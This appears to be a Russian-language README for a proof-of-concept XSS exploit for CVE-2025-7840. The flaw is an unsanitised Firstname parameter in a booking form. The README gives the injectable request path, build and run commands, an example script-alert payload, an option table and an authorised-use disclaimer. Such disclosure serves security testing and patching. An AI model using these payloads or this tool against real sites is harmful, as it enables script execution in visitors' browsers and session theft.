
Эксплойт для проверки концепции для CVE‑2025‑7840, который внедряет вредоносные полезные нагрузки в параметр Firstname формы бронирования для запуска XSS.
Автор: Byte Reaper (@ByteReaper0)
Эксплойт доказательства концепции для CVE-2025-7840, нацеленный на уязвимую конечную точку веб-приложения, которая не санирует пользовательский ввод в параметре Firstname формы бронирования. Создавая GET-запрос к:
/index.php?page=reserve&Firstname=<payload>&Lastname=test
злоумышленник может внедрить и выполнить произвольный JavaScript в браузере жертвы при рендеринге ответа.
-b-c-v)libcurlargparse для CСкомпилируйте эксплойт:
gcc -o exploit exploit.c argparse.c -lcurl
sudo ./exploit -u <TARGET_URL> [options]
Запуск стандартных полезных нагрузок против цели:
sudo ./exploit -u http://victim.local
Использование пользовательской полезной нагрузки:
sudo ./exploit -u http://victim.local -b "<script>alert(\'PWNED\')</script>"
Включение сессионных cookie и подробного вывода:
sudo ./exploit -u http://victim.local -c cookies.txt -v
Этот код предоставлен только для образовательных целей и тестирования. Несанкционированное использование против систем, которыми вы не владеете или не имеете явного разрешения на тестирование, является незаконным и неэтичным.
MIT
| Флаг | Описание |
|---|
-u URL | Базовый URL цели (например, http://victim.local) |
-b PAYLOAD | Пользовательская XSS-полезная нагрузка для внедрения |
-c FILE | Файл cookie jar для управления сессиями |
-v | Подробный режим (показывать детали запросов/ответов) |